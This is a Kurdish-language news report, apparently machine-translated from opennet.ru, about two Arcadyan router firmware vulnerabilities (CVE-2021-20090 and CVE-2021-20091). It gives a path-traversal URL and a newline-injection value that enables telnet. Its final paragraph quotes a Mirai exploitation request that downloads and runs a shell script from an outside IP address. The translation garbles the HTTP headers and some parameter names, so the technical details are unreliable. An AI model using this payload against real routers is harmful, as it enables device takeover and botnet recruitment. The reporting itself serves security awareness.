Zehfbûna di routerên malê de bandorê li 17 hilberîner dike

Êrîşek mezin li ser torê li dijî routerên malê ku firmware wan pêkanîna serverek HTTP ji pargîdaniya Arcadyan bikar tîne, hate tomar kirin. Ji bo bidestxistina kontrolê li ser cîhazan, berhevokek du qelsiyan tê bikar anîn ku destûrê dide darvekirina ji dûr a koda keyfî bi mafên root. Pirsgirêk bandorê li rêgezên ADSL yên ji Arcadyan, ASUS û Buffalo, û her weha cîhazên ku di bin markayên Beeline de têne peyda kirin (pirsgirêk di Smart Box Flash de hatî pejirandin), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone û operatorên telekomê yên din. Tê destnîşan kirin ku pirsgirêk zêdetirî 10 sal in di firmware Arcadyan de heye û di vê demê de kariye ku ji 20 hilberînerên cihêreng koçî herî kêm 17 modelên cîhazê bike.

Zehfiya yekem, CVE-2021-20090, gengaz dike ku meriv bigihîje her skrîpta navbeynkariya malperê bêyî pejirandinê. Esasê qelsiyê ev e ku di navgîniya malperê de, hin pelrêçan ku bi navgîniya wêne, pelên CSS û nivîsarên JavaScript têne şandin, bêyî pejirandinê têne gihîştin. Di vê rewşê de, pelrêçiyên ku gihîştina wan bêyî pejirandinê destûr e, bi karanîna maskeya destpêkê têne kontrol kirin. Diyarkirina tîpên "../" di rêyên ku diçin pelrêça dêûbav ji hêla firmware ve tê asteng kirin, lê karanîna hevberdana "..%2f" tê derbas kirin. Bi vî rengî, dema şandina daxwazên mîna "http://192.168.1.1/images/..%2findex.htm" gengaz e ku meriv rûpelên parastî veke.

Zehfiya duyemîn, CVE-2021-20091, dihêle bikarhênerek pejirandî ku li mîhengên pergalê yên cîhazê guhezîne bi şandina pîvanên taybetî yên formatkirî ji skrîpta apply_abstract.cgi re, ku hebûna karakterek nû ya di parameteran de kontrol nake. . Mînakî, dema ku operasyonek ping pêk tîne, êrîşkar dema ku pelê mîhengan diafirîne dikare nirxa "192.168.1.2%0AARC_SYS_TelnetdEnable=1" li qada ku navnîşana IP-yê tê kontrol kirin, û skrîptê diyar bike, dema ku pelê mîhengan diafirîne /tmp/etc/config/. .glbcfg, dê rêzika "AARC_SYS_TelnetdEnable=1" tê de binivîsîne ", ku servera telnetd-ê çalak dike, ku gihîştina şêlê fermanê ya bêsînor bi mafên root re peyda dike. Bi heman rengî, bi danîna parametreya AARC_SYS, hûn dikarin her kodek li ser pergalê bicîh bikin. Zelalbûna yekem dihêle ku meriv skrîptek problematîk bêyî pejirandinê bigihîje wê wekî "/images/..%2fapply_abstract.cgi".

Ji bo îstismarkirina qelsiyan, divê êrîşkar karibe daxwazekê bişîne porta torê ya ku pêwendiya webê lê tê xebitandin. Li gorî dînamîkên belavbûna êrîşê dadbar dikin, gelek operator ji tora derveyî gihîştina cîhazên xwe dihêlin da ku tespîtkirina pirsgirêkan ji hêla karûbarê piştgiriyê ve hêsan bikin. Ger gihîştina navberê tenê bi tora navxweyî re sînordar be, êrîşek dikare ji torgilokek derveyî bi karanîna teknîka "DNS rebinding" were kirin. Qelsî jixwe ji bo girêdana routeran bi botneta Mirai ve bi awayekî çalak têne bikar anîn: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Têkilî: Bikarhêner-Agent nêzîk: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D_5. 212.192.241.7%0A ARC_SYS_TelnetdEnable=1& %0AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://212.192.241.72/lolol.sh; chmod+777+lolol.sh; sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4

Source: opennet.ru

Add a comment